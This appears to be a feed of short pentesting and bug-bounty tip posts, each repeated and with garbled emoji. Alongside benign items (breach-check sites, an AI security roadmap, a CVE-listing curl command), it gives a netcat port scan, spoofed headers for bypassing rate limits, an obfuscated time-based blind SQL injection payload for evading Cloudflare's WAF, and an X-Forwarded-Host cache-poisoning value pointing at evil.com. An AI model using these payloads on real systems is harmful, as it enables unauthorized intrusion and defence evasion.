Quick Port Scan Without Nmapโ๏ธโ
nc -zv abc.com 1-1000
Useful when Nmap is blocked.
Lightweight โ useless.โ๐ป
#Pentesting #Networking #HacklidoTips
nc -zv abc.com 1-1000
Useful when Nmap is blocked.
Lightweight โ useless.โ๐ป
#Pentesting #Networking #HacklidoTips
๐4
Bypassing Rate Limit Protection๐ง๐ปโ๐ป๐ฉ๐ปโ๐ป
Add these headers in your request [through burp suite]โ๐ป
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
#BugBounty #WebSecurity #HacklidoTips
Add these headers in your request [through burp suite]โ๐ป
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
#BugBounty #WebSecurity #HacklidoTips
โค4
Breach Data Check websites
1. Have I Been Pwned [haveibeenpwned.com]
2. Firefox Monitor [monitor.mozilla.org]
3. Data Breach [databreach.com]
4. LeakCheck [leakcheck.io]
5. Quick Heal Data Breach Checker [https://www.quickheal.co.in/data-breach-checker]
#DataLeaks #Cybersecurity #HacklidoTips #Hacklido
1. Have I Been Pwned [haveibeenpwned.com]
2. Firefox Monitor [monitor.mozilla.org]
3. Data Breach [databreach.com]
4. LeakCheck [leakcheck.io]
5. Quick Heal Data Breach Checker [https://www.quickheal.co.in/data-breach-checker]
#DataLeaks #Cybersecurity #HacklidoTips #Hacklido
AI SECURITY ROADMAP๐ฅ
Stage 1 : Foundational Principles and Governance
Stage 2 : Threat Modeling and Risk Assessment
Stage 3 : Secure AI Development
Stage 4 : Secure Deployment and Monitoring
Stage 5 : Incident Response and Forensics
Stage 6 : Advanced Security and Future Trends
#AISecurity #AIRoadmap #Roadmap #Hacklido #HacklidoTips
Stage 1 : Foundational Principles and Governance
Stage 2 : Threat Modeling and Risk Assessment
Stage 3 : Secure AI Development
Stage 4 : Secure Deployment and Monitoring
Stage 5 : Incident Response and Forensics
Stage 6 : Advanced Security and Future Trends
#AISecurity #AIRoadmap #Roadmap #Hacklido #HacklidoTips
โค5
Agentic SOCs Explained | The Future of Security Operations
https://www.youtube.com/watch?v=ZxQLbagvyOI
Complete Agentic SOC Roadmap:
https://hacklido.com/blog/1355-agentic-soc-roadmap-from-beginner-to-advanced
https://www.youtube.com/watch?v=ZxQLbagvyOI
Complete Agentic SOC Roadmap:
https://hacklido.com/blog/1355-agentic-soc-roadmap-from-beginner-to-advanced
YouTube
Agentic SOCs Explained | The Future of Security Operations + Complete Learning Roadmap
In this video, we explain what Agentic SOCs are, how they work, and why they represent the future of Security Operations Centers (SOC).
An Agentic SOC uses AI agents and automation to assist SOC analysts with alert triage, investigation, threat hunting,โฆ
An Agentic SOC uses AI agents and automation to assist SOC analysts with alert triage, investigation, threat hunting,โฆ
How I track the latest CVEs โ top 20, fast ๐ฅ
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
==> Want id+summary?
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://
Tool: cvedb.shodan.io
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
==> Want id+summary?
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://
Tool: cvedb.shodan.io
Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
โ Blocked Payload
(select(0)from(select(sleep(10)))v) โ 403 Forbidden
โ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
๐ This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
โ Blocked Payload
(select(0)from(select(sleep(10)))v) โ 403 Forbidden
โ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
๐ This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
โค3
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
โข CDN: Reads first โ Allows โ
โข App: Reads last โ Injects
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
โข CDN: Reads first โ Allows โ
โข App: Reads last โ Injects